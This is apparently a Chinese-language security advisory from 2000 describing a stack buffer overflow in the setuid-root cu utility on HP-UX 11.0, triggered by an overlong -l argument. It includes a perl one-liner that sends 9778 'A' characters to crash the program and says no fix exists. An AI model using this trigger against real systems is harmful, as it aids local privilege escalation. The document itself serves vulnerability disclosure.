HP-UX cu 缓冲溢出漏洞发布时间:2000-11-03 更新时间:2000-10-03 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 HP HP-UX 11.0详细描述 cu是一个UNIX工具用来两个主机的通信,一般通过电话线,是以SETUID ROOT的 身份安装。 HP-UX 11.0 的cu存在一个缓冲溢出可以导致本地用户获得ROOT权利,原因是-l 选项使用时没有很安全的处理,如果-l后面增加9777个字节,就会发生堆栈破坏。 测试代码 $ ls -la `which cu` -r-sr-xr-x 1 bin 40960 9 avr 1998 /bin/cu Using '-l' with a long option string: $ cu -l `perl -e 'printf "A" x 9777'` La connexion a chou : Requested device/system name not known $ cu -l `perl -e 'printf "A" x 9778'` Memory fault 解决方案 尚无 相关信息 |
